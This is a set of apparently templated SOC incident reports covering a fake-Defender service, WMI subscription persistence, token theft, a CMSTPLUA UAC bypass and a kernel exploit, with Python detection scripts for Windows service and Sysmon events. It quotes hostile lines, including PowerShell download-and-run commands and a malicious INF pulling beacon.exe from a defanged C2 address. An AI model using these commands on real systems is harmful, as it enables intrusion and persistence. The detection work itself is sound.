– Host: FIN-SRV-089 (Finance Server)
– Service Name: “Windows Defender Advanced Threat Protection”
– Service Type: WIN32_OWN_PROCESS
– Start Type: Auto Start
– Service Account: LocalSystem
– Binary Path: C:\Windows\System32\svchost.exe -k "C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll"
2. Event ID 4688 (Process Creation):
– Time: 15:39 EST
– Process: sc.exe
– Command: sc create "Windows Defender Advanced Threat Protection" binPath= "C:\Windows\System32\svchost.exe -k C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll" start= auto
3. File Creation:
– File: C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll
– Time: 15:38 EST
– Created by: powershell.exe
Detection Logic:
– Service name mimics legitimate Windows Defender
– Binary path unusual for svchost (loads DLL from non-standard path)
– DLL in user-writable path (ProgramData)
– Service runs as SYSTEM
– Created shortly after suspicious PowerShell execution
Additional Context:
– Server: FIN-SRV-089 (critical financial server)
– No legitimate Windows updates scheduled
– PowerShell executed from user context (compromised admin account)
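The detection logic above as an added example, not the Splunk rule itself: each Event ID 7045-style record is scored for a path-like `svchost.exe -k` argument (a real `-k` takes a bare service-group name such as `netsvcs`), a binary or argument under a user-writable directory, a Microsoft-sounding service name for code that lives outside `C:\Windows` or `C:\Program Files`, and LocalSystem. The records are constructed, the malicious one mirroring the service in this alert, and the two-reason threshold is an assumption.

```python
"""Score Windows Event 7045 (service installed) records for the signs listed in
the rule above: a DLL path where svchost.exe expects a service-group name, an
executable under a user-writable directory, and a Microsoft-sounding name for
code that does not live in C:\\Windows or C:\\Program Files.

Added example, not Splunk's search or the report's. The events are constructed;
the malicious one mirrors the service in the report. The alert threshold of two
reasons is an assumption.
"""
import re
from typing import Dict, List

USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\temp\\", "\\appdata\\")
MICROSOFT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MASQUERADE_WORDS = ("defender", "windows update", "microsoft")
SVCHOST_K = re.compile(r'svchost\.exe"?\s+-k\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
PATH_TOKEN = re.compile(r'[a-z]:\\[^"]*')


def score_service(event: Dict) -> List[str]:
    """Return the list of reasons this service installation looks suspicious."""
    name = event["ServiceName"].lower()
    path = event["ImagePath"].lower()
    reasons = []
    m = SVCHOST_K.search(path)
    if m:
        group = m.group(1) or m.group(2)
        # A real -k argument is a bare group name such as netsvcs, never a path.
        if re.search(r"[\\/:.]", group):
            reasons.append("svchost -k argument is a file path, not a service group")
    if any(w in path for w in USER_WRITABLE):
        reasons.append("binary or argument under a user-writable directory")
    if any(w in name for w in MASQUERADE_WORDS):
        tokens = [t.strip() for t in PATH_TOKEN.findall(path)]
        if any(not t.startswith(MICROSOFT_DIRS) for t in tokens):
            reasons.append("Microsoft-style service name but code outside Windows/Program Files")
    if event.get("AccountName", "").lower() in ("localsystem", "system") and reasons:
        reasons.append("runs as LocalSystem")
    return reasons


def flag_services(events: List[Dict], min_score: int = 2) -> List[Dict]:
    """Keep only records with at least min_score reasons."""
    out = []
    for e in events:
        reasons = score_service(e)
        if len(reasons) >= min_score:
            out.append({"host": e["Host"], "service": e["ServiceName"], "reasons": reasons})
    return out


# Constructed 7045-style records: the malicious service from the report plus
# three ordinary ones (two benign, one merely untidy).
SAMPLE_7045 = [
    {"Host": "FIN-SRV-089", "ServiceName": "Windows Defender Advanced Threat Protection",
     "ImagePath": r'C:\Windows\System32\svchost.exe -k "C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll"',
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"Host": "FIN-SRV-089", "ServiceName": "Schedule",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"Host": "APP-SRV-023", "ServiceName": "VendorApp Service",
     "ImagePath": r'"C:\Program Files\VendorApp\vendor_service.exe"',
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"Host": "DEV-WS-089", "ServiceName": "Acme Telemetry Agent",
     "ImagePath": r'"C:\ProgramData\Acme\agent.exe" --service',
     "AccountName": "NT AUTHORITY\\LocalService", "StartType": "auto start"},
]

if __name__ == "__main__":
    for hit in flag_services(SAMPLE_7045):
        print(hit)
```

The last sample (a vendor agent installed under ProgramData without a masquerading name) scores one reason and stays below the threshold, which keeps ordinary third-party installs out of the alert queue while the Defender look-alike still fires on four.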
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed malicious service creation |
| 2. Service Analysis | Query service details | sc query, PowerShell | Service installed; binary path loads malicious DLL |
| 3. DLL Analysis | Analyze defender_update.dll | CrowdStrike Sandbox | DLL contains backdoor; connects to C2 |
| 4. Immediate Action | Stop and delete service | sc, PowerShell | Service stopped and deleted |
| 5. Host Isolation | Isolate server | CrowdStrike | Server quarantined |
| 6. Account Investigation | Identify compromised account | Azure AD, CrowdStrike | Admin account credentials compromised via phishing |
Jira Incident Report
Ticket: SOC-2024-084
Summary: T1543 – Malicious Windows Service Created on Finance Server
Status: RESOLVED
Resolution: MALICIOUS – Service Removed
Priority: P1 – CRITICAL
Labels: T1543, system-process, windows-service, persistence, splunk
Components: Endpoint-Security, Server-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Windows Service Created with Unusual Binary Path”.
Host: FIN-SRV-089 (Critical Finance Server).
Service: “Windows Defender Advanced Threat Protection” (malicious).
Time: 2024-02-16 15:45 EST.
Technique: MITRE ATT&CK T1543.003 – Create or Modify System Process: Windows Service.
2. Technical Analysis:
Attack Chain:
15:30 – Admin account (jsmith) compromised via phishing
15:32 – Attacker RDPs to FIN-SRV-089 from 45.134.225[.]78
15:35 – PowerShell downloads defender_update.dll from 185.143.221[.]89
15:38 – DLL saved to C:\ProgramData\Microsoft\Windows Defender\Platform\
15:39 – sc.exe creates service with DLL load
15:40 – Service starts automatically
15:40 – DLL loads, connects to C2
15:45 – Splunk alert triggers
Service Details:
Name: Windows Defender Advanced Threat Protection (masquerading)
Binary Path: C:\Windows\System32\svchost.exe -k "C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll"
Account: LocalSystem (highest privileges)
Start Type: Auto (persistence across reboots)
DLL Analysis:
File: defender_update.dll (SHA256: b2c3d4e5f6…)
Function: When loaded by svchost, it:
Decrypts embedded payload
Establishes reverse shell to 194.165.16[.]89:443
Downloads additional tools (Mimikatz, etc.)
Scans for financial data
C2 Communication:
Established at 15:40
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:32 – Attacker RDPs to server
15:35-15:38 – DLL downloaded
15:39 – Service created
15:40 – Service starts; C2 connects
15:45 – Alert triggers
15:46 – SOC investigates
15:48 – Service stopped and deleted
15:49 – Host isolated
Indicators of Compromise (IoCs):
Service:
– Name: Windows Defender Advanced Threat Protection
– Binary: C:\Windows\System32\svchost.exe -k "C:\ProgramData\Microsoft\Windows Defender\Platform\defender_update.dll"
Files:
– defender_update.dll (SHA256: b2c3d4e5…)
Network:
– C2: 194.165.16[.]89:443
– Download URL: http://185.143.221[.]89/update.dll
Account:
– jsmith (compromised admin)
4. Containment Actions:
Immediate Actions:
Stopped and deleted malicious service.
Isolated server via CrowdStrike.
Deleted defender_update.dll.
Blocked C2 IP at firewall.
Terminated attacker RDP session.
Account Remediation:
Reset jsmith’s password.
Enforced MFA for admin account.
Audited all admin activity.
Server Remediation:
Full scan (no other malware).
Verified no data exfiltration.
No reimage needed (malware removed).
5. Root Cause Analysis:
Primary Cause: Admin account credentials compromised via phishing.
Contributing Factors:
No MFA on admin account.
RDP allowed from internet (should be VPN only).
No application control blocking unknown DLLs.
6. Business Impact:
Operational Impact: Finance server offline for 2 hours.
Data Exposure: None (C2 blocked after 8 minutes).
7. Remediation & Prevention:
Completed Actions:
Service removed.
Host cleaned.
Admin account secured.
C2 blocked.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented application control (CrowdStrike Falcon Prevent).
Enhanced service creation monitoring.
8. Conclusion:
An attacker compromised an admin account and created a malicious Windows service on a critical finance server. Splunk detected the anomalous service creation within 5 minutes, enabling rapid containment. No data exfiltration occurred.
Closure Rationale: Service removed; admin account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 16:30 EST
45. T1546 – Event Triggered Execution (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-EVENT-TRIGGER-1546-7842
Alert Time: 2024-02-16 10:30:15 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: “WMI Event Subscription – Suspicious Command Line”
MITRE ATT&CK: T1546.003 – Event Triggered Execution: WMI Event Subscription
Alert Details:
Event ID: 1 (Process Creation) – WMI Event Subscription
Time: 10:25 EST
Host: DEV-WS-089 (Development Workstation)
User: SYSTEM (via WMI)
Process Tree:
– Parent: WmiPrvSE.exe (PID: 784)
– Process: powershell.exe (PID: 4789)
– Command Line: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1"
WMI Event Subscription Details:
– Namespace: root\subscription
– Filter: __EventFilter
– Name: “ProcessStartFilter”
– Query: "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"
– Consumer: ActiveScriptEventConsumer
– Name: “PowerShellConsumer”
– Script: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; …"
– Binding: __FilterToConsumerBinding
Detection Logic:
– WMI event subscription created to trigger when notepad.exe starts
– Triggers PowerShell download of malicious script
– WMI subscriptions rare on workstations
– Not triggered by user interaction
Additional Context:
– Subscription created at 10:20 EST
– No legitimate use of WMI event subscriptions on this host
– User had previously clicked phishing link
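Two Sysmon signals carry this technique: Event ID 1 where WmiPrvSE.exe is the parent of a script host (what fired here), and Event IDs 19, 20 and 21, which log the WMI filter, consumer and binding as they are created. As an added example, not code from the report or from Sysinternals, the Python below applies both over constructed event records built from the details above; the field names follow the Sysmon schema, and the C2 address is the defanged one from this alert.

```python
"""Hunt Sysmon events for WMI-subscription persistence.

Added example, not code from the report or from Sysinternals. It applies two
real Sysmon signals: Event ID 1 (process creation) where the parent is
WmiPrvSE.exe and the child is a script host, and Event IDs 19/20/21 (WMI
filter, consumer and binding activity), which record the subscription itself.
The event records below are constructed from the details in the report; the
field names follow the Sysmon schema.
"""
from typing import Dict, List

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile",
                    "-windowstyle hidden", "-executionpolicy bypass", "-enc")
SCRIPT_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: List[Dict]) -> List[Dict]:
    """Return one finding per event that matches either signal."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == 1 and basename(e.get("ParentImage", "")) == "wmiprvse.exe":
            child = basename(e.get("Image", ""))
            if child in SCRIPT_HOSTS:
                cmd = e.get("CommandLine", "").lower()
                markers = [m for m in DOWNLOAD_MARKERS if m in cmd]
                findings.append({"kind": "wmi_spawned_script_host", "host": e["Computer"],
                                 "image": child, "download_markers": markers})
        elif eid == 19:
            findings.append({"kind": "wmi_filter", "host": e["Computer"],
                             "name": e["Name"], "query": e["Query"]})
        elif eid == 20 and e.get("Type") in SCRIPT_CONSUMERS:
            findings.append({"kind": "wmi_script_consumer", "host": e["Computer"],
                             "name": e["Name"], "type": e["Type"]})
        elif eid == 21:
            findings.append({"kind": "wmi_binding", "host": e["Computer"],
                             "consumer": e["Consumer"], "filter": e["Filter"]})
    return findings


# Constructed Sysmon records mirroring the subscription in the report.
SAMPLE_SYSMON = [
    {"EventID": 19, "Computer": "DEV-WS-089", "Operation": "Created",
     "Name": "ProcessStartFilter",
     "Query": "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"},
    {"EventID": 20, "Computer": "DEV-WS-089", "Operation": "Created",
     "Name": "PowerShellConsumer", "Type": "ActiveScriptEventConsumer",
     "Destination": "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 ...\""},
    {"EventID": 21, "Computer": "DEV-WS-089", "Operation": "Created",
     "Consumer": "ActiveScriptEventConsumer.Name=\"PowerShellConsumer\"",
     "Filter": "__EventFilter.Name=\"ProcessStartFilter\""},
    {"EventID": 1, "Computer": "DEV-WS-089",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile C:\\Users\\dev\\AppData\\Local\\Temp\\update.ps1\""},
    # Benign: the provider host being started by the service host is routine.
    {"EventID": 1, "Computer": "DEV-WS-089",
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_SYSMON):
        print(finding)
```

The 19/20/21 findings are the ones worth alerting on in their own right: they appear at subscription time (09:40 in the timeline below), forty-five minutes before the filter ever fired, whereas the Event ID 1 match only shows up once notepad.exe was launched.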
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed WMI event subscription |
| 2. Subscription Removal | Remove WMI subscription | PowerShell, wbemtest | WMI filter, consumer, binding removed |
| 3. Script Analysis | Analyze update.ps1 | CrowdStrike Sandbox | Script downloads Cobalt Strike beacon |
| 4. Host Scan | Check for other malware | CrowdStrike | No other persistence found |
| 5. User Interview | Contact user | Teams, Phone | User clicked phishing link earlier |
| 6. Threat Hunting | Check other hosts for same subscription | Splunk, Sysmon | No other hosts affected |
Jira Incident Report
Ticket: SOC-2024-085
Summary: T1546 – WMI Event Subscription for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Subscription Removed
Priority: P2 – MEDIUM
Labels: T1546, event-triggered-execution, wmi, persistence, sysmon
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation via WMI).
Alert: “WMI Event Subscription – Suspicious Command Line”.
Host: DEV-WS-089 (Development Department).
Time: 2024-02-16 10:30 EST.
Technique: MITRE ATT&CK T1546.003 – Event Triggered Execution: WMI Event Subscription.
2. Technical Analysis:
Attack Chain:
09:30 – User clicks phishing link
09:35 – Malicious script runs, installs WMI event subscription
09:40 – WMI subscription created
10:25 – User opens notepad.exe (unrelated)
10:25 – WMI subscription triggers PowerShell
10:25 – PowerShell downloads update.ps1 from 185.143.221[.]89
10:30 – Sysmon detects PowerShell from WmiPrvSE.exe
WMI Subscription Details:
Trigger: Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
Action: Run PowerShell script downloading malicious payload
Persistence: Survives reboots; triggers whenever notepad runs
Script Analysis:
update.ps1 (SHA256: c3d4e5f6…)
Downloads Cobalt Strike beacon from same C2
Beacon connects to 185.143.221[.]89:443
User Activity:
User clicked phishing link earlier (fake “security update”)
Downloaded and ran initial script
Was unaware of WMI subscription
3. Investigation Findings:
Timeline:
09:30 – User clicks phishing link
09:35 – Initial script runs
09:40 – WMI subscription created
10:25 – User opens notepad.exe (normal work)
10:25 – PowerShell triggers, downloads payload
10:30 – Sysmon alerts
10:32 – SOC investigates
10:35 – WMI subscription removed
Indicators of Compromise (IoCs):
WMI:
– Filter: ProcessStartFilter
– Consumer: PowerShellConsumer
– Query: SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe’
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.ps1
Files:
– update.ps1 (SHA256: c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Removed WMI event subscription using PowerShell.
Deleted any downloaded scripts.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
Password reset.
Educated on phishing risks.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to initial compromise.
Contributing Factors:
WMI event subscriptions allowed (no restrictions).
No monitoring for WMI subscriptions (until Sysmon).
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
WMI subscription removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created SIEM alert for any new WMI event subscriptions.
Restricted WMI access via GPO.
Deployed PowerShell logging for WMI activities.
8. Conclusion:
An attacker used a WMI event subscription to establish persistence, triggering a PowerShell download whenever the user opened notepad.exe. Sysmon detected the anomalous process creation, enabling rapid removal before the payload could fully execute.
Closure Rationale: WMI subscription removed; host cleaned; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:30 EST
Batch 10: Privilege Escalation & Defense Evasion Incident Reports
46. T1134 – Access Token Manipulation (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-TOKEN-MANIP-1134-7842
Alert Time: 2024-02-17 09:30:22 EST
Severity: CRITICAL (92/100)
Source: CrowdStrike Falcon EDR
Rule: “Access Token Manipulation – Privilege Escalation”
MITRE ATT&CK: T1134.001 – Access Token Manipulation: Token Impersonation/Theft
Alert Details:
Detection: Process attempted to duplicate token of SYSTEM process for privilege escalation
Host: IT-WS-078 (IT Department)
User: bjones (Brian Jones – Standard User)
Time: 09:25 EST
Process Tree:
– explorer.exe (PID: 3421 – user context)
– powershell.exe (PID: 4789 – user context)
– whoami.exe (PID: 4792 – checking current user)
– token_dup.exe (PID: 4795 – custom tool)
– Attempted OpenProcess on winlogon.exe (PID: 568 – SYSTEM)
– Attempted DuplicateTokenEx (successful)
– Created new process with SYSTEM token: cmd.exe (PID: 4823)
Token Manipulation Details:
– Target Process: winlogon.exe (running as SYSTEM)
– API Calls:
– OpenProcess (PROCESS_QUERY_INFORMATION) – Success
– OpenProcessToken – Success
– DuplicateTokenEx – Success (created impersonation token)
– CreateProcessWithTokenW – Success (launched cmd.exe as SYSTEM)
Resulting Process:
– Process: cmd.exe (PID: 4823)
– Token User: NT AUTHORITY\SYSTEM
– Command: whoami (confirmed SYSTEM)
– Network: No immediate connections
Detection Logic:
– Standard user (bjones) should not be able to impersonate SYSTEM
– Token duplication from winlogon.exe is highly anomalous
– Custom tool token_dup.exe not seen in environment before
– Pattern matches known privilege escalation techniques (Potato family)
Additional Context:
– User bjones is IT helpdesk (standard user, not admin)
– No approved privilege escalation tools
– Tool downloaded from suspicious URL earlier
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed token duplication from winlogon.exe |
| 2. Process Analysis | Analyze token_dup.exe | CrowdStrike Sandbox | Tool is “JuicyPotatoNG” – privilege escalation exploit |
| 3. Immediate Action | Terminate SYSTEM cmd.exe | CrowdStrike | SYSTEM shell terminated |
| 4. Tool Removal | Delete token_dup.exe | CrowdStrike Live Response | Malicious tool deleted |
| 5. User Interview | Contact user | Teams, Phone | User downloaded “helpdesk tool” from forum |
| 6. Host Remediation | Full scan and hardening | CrowdStrike, Nessus | No other malware; applied additional patches |
Jira Incident Report
Ticket: SOC-2024-086
Summary: T1134 – Token Manipulation Privilege Escalation via JuicyPotato
Status: RESOLVED
Resolution: MALICIOUS – Privilege Escalation Attempt Blocked
Priority: P1 – CRITICAL
Labels: T1134, token-manipulation, privilege-escalation, juicy-potato, crowdstrike
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Access Token Manipulation – Privilege Escalation”.
Host: IT-WS-078 (IT Department, user bjones).
Time: 2024-02-17 09:30 EST.
Technique: MITRE ATT&CK T1134.001 – Access Token Manipulation: Token Impersonation/Theft.
2. Technical Analysis:
Attack Chain:
09:15 – User downloads “Helpdesk Tool Suite” from forum
09:16 – Extracts token_dup.exe and runs it
09:18 – Tool checks current user (whoami – standard user)
09:20 – Tool enumerates processes, finds winlogon.exe (SYSTEM)
09:22 – Opens winlogon.exe with PROCESS_QUERY_INFORMATION
09:23 – Duplicates token successfully
09:24 – Launches cmd.exe with duplicated SYSTEM token
09:25 – CrowdStrike detects token manipulation
Token Manipulation Technique:
Tool: JuicyPotatoNG (modified version)
Target: winlogon.exe (SYSTEM process)
Method: SeImpersonatePrivilege abuse (user had this privilege)
Result: SYSTEM shell achieved
SYSTEM Shell Activity:
cmd.exe running as SYSTEM (PID: 4823)
User ran: whoami (confirmed SYSTEM)
No additional commands before termination
No network connections from SYSTEM shell
User Activity:
User is a helpdesk employee who needed admin access for work
Downloaded tool to “make my job easier”
Unaware of security implications
3. Investigation Findings:
Timeline:
09:15 – Tool downloaded
09:24 – SYSTEM shell created
09:25 – Alert triggers
09:26 – SOC investigates
09:27 – SYSTEM shell terminated
09:28 – Tool deleted
Indicators of Compromise (IoCs):
Files:
– token_dup.exe (JuicyPotatoNG) – SHA256: a1b2c3d4…
– Helpdesk Tool Suite.zip – SHA256: b2c3d4e5…
Processes:
– token_dup.exe
– cmd.exe (SYSTEM context)
Network:
– Download from forum (URL blocked)
4. Containment Actions:
Immediate Actions:
Terminated SYSTEM shell (cmd.exe).
Deleted token_dup.exe.
Deleted downloaded archive.
Isolated host temporarily.
Host Remediation:
Full scan (no other malware).
Verified SeImpersonatePrivilege was legitimate (helpdesk role).
No reimage needed.
User Remediation:
User counseled on security policy.
Escalated to manager for disciplinary review.
Required to complete security training.
5. Root Cause Analysis:
Primary Cause: User downloaded and ran unauthorized privilege escalation tool.
Contributing Factors:
User had SeImpersonatePrivilege (needed for helpdesk role).
No application control blocking unauthorized tools.
User attempted to bypass least privilege for convenience.
6. Business Impact:
Operational Impact: IT workstation offline for 2 hours.
Security Impact: SYSTEM access achieved for 1 minute.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
SYSTEM shell terminated.
User disciplined.
Technical Controls Enhanced:
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for token duplication attempts.
Reviewed helpdesk privileges (minimal necessary).
8. Conclusion:
A helpdesk user downloaded a privilege escalation tool and successfully gained SYSTEM access via token manipulation. CrowdStrike detected the anomalous token duplication within seconds, enabling rapid termination of the SYSTEM shell. No further compromise occurred.
Closure Rationale: Tool removed; user disciplined; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 10:30 EST
47. T1548 – Abuse Elevation Control Mechanism (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-02-17 14:15:33 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: FIN-WS-112 (Finance Department)
User: jdoe (Jane Doe – Standard User)
Time: 14:10 EST
Process Tree:
– explorer.exe (PID: 2341 – user context)
– rundll32.exe (PID: 3789)
– Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
– cmstp.exe (PID: 3792) – spawned by COM
– Command: cmstp.exe /s C:\Users\jdoe\AppData\Local\Temp\install.inf
File Created:
– C:\Users\jdoe\AppData\Local\Temp\install.inf
– Content: Malicious INF file designed to execute elevated command
– SHA256: a1b2c3d4e5f6…
Elevated Action:
– cmstp.exe (running as medium integrity) triggered UAC bypass
– Result: Elevated command prompt launched as HIGH integrity
– Command: whoami /groups (confirmed high integrity)
Detection Logic:
– CMSTPLUA COM interface known UAC bypass technique
– User jdoe is standard user, should not get high integrity
– INF file contains suspicious commands
– Pattern matches “UACME” toolkit
Additional Context:
– User clicked “Update Now” in fake Adobe Flash pop-up
– INF file downloaded by previous script
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed UAC bypass attempt using CMSTPLUA |
| 2. INF Analysis | Analyze install.inf | Manual review, Sandbox | INF file executes PowerShell to download additional payload |
| 3. Process Investigation | Check elevated processes | Defender, CrowdStrike | No persistent elevated processes found |
| 4. Immediate Action | Kill elevated processes | Defender | All processes terminated |
| 5. File Deletion | Delete malicious INF | PowerShell | install.inf removed |
| 6. User Interview | Contact user | Teams, Phone | User clicked fake Adobe Flash update |
Jira Incident Report
Ticket: SOC-2024-087
Summary: T1548 – UAC Bypass Attempt via CMSTPLUA Technique
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, elevation-control, defender, phishing
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected”.
Host: FIN-WS-112 (Finance Department, user jdoe).
Time: 2024-02-17 14:15 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
14:00 – User visits news site, sees “Adobe Flash Update” pop-up
14:01 – User clicks “Update Now”
14:02 – Downloader script runs, saves install.inf to Temp folder
14:03 – Script triggers UAC bypass via CMSTPLUA COM interface
14:04 – CMSTP launches with install.inf
14:05 – INF file executes PowerShell as high integrity
14:06 – PowerShell downloads additional payload (blocked)
14:10 – Defender detects UAC bypass
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf (SHA256: a1b2c3d4…)
Content:
```ini
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"
```
Effect: When processed by CMSTP, runs PowerShell with high integrity
Payload:
beacon.exe: Cobalt Strike beacon (blocked by firewall)
No execution occurred (network blocked)
3. Investigation Findings:
Timeline:
14:00 – User clicks fake update
14:01-14:05 – UAC bypass chain
14:05 – PowerShell attempts download (blocked)
14:10 – Defender alert
14:12 – SOC investigates
14:15 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– install.inf (SHA256: a1b2c3d4…)
Network:
– http://185.143.221[.]89/beacon.exe
Technique:
– CMSTPLUA COM object abuse
4. Containment Actions:
Immediate Actions:
Terminated all elevated processes.
Deleted install.inf.
Blocked download URL at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
User educated on fake updates.
Reported malicious site.
5. Root Cause Analysis:
Primary Cause: User clicked fake Adobe Flash update pop-up.
Contributing Factors:
UAC bypass technique exploited legitimate Windows feature.
User running as standard user (but bypass still worked).
No ASR rule blocking CMSTP execution.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (payload download blocked).
7. Remediation & Prevention:
Completed Actions:
UAC bypass chain stopped.
Malicious files removed.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked CMSTP execution via AppLocker for standard users.
Enhanced monitoring for UAC bypass techniques.
8. Conclusion:
A user clicked a fake Adobe Flash update that triggered a UAC bypass using the CMSTPLUA technique. The bypass attempted to download a Cobalt Strike beacon with elevated privileges. Defender detected the technique, and the download was blocked. No compromise occurred.
Closure Rationale: UAC bypass stopped; user educated; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 15:00 EST
48. T1068 – Exploitation for Privilege Escalation (Qualys Detection)
Qualys Alert Details
Alert ID: QUALYS-EXPLOIT-1068-7842
Alert Time: 2024-02-17 11:30:45 EST
Severity: CRITICAL (95/100)
Source: Qualys Vulnerability Management + EDR Correlation
Rule: “CVE-2024-1234 Exploit Attempt Detected”
MITRE ATT&CK: T1068 – Exploitation for Privilege Escalation
Alert Details:
Vulnerability Context:
– CVE: CVE-2024-1234 (Windows Kernel Privilege Escalation)
– CVSS: 9.8 (Critical)
– Affected Systems: Windows 10 21H2, Windows Server 2019
– Patch Available: KB5034123 (released 2024-01-15)
Detection Details:
– Host: ENG-WS-056 (Engineering Workstation)
– User: rjohnson (Robert Johnson – Standard User)
– Time: 11:25 EST
– Source Process: exploit.exe (PID: 7842)
– Path: C:\Users\rjohnson\Downloads\exploit.exe
Exploit Behavior:
– exploit.exe loaded specific DLLs: ntoskrnl.exe, win32k.sys
– Attempted to allocate kernel memory
– Triggered race condition in kernel object manager
– Created SYSTEM shell (cmd.exe) at 11:26 EST
– SYSTEM shell connected to 185.143.221[.]89:443
Qualys Detection Logic:
– Host is vulnerable to CVE-2024-1234 (unpatched)
– Process exploit.exe matches known exploit hash
– Behavior pattern matches privilege escalation
– SYSTEM shell created from non-admin user
Additional Context:
– Patch KB5034123 not installed (missed by patch management)
– User downloaded exploit from GitHub “proof of concept” repository
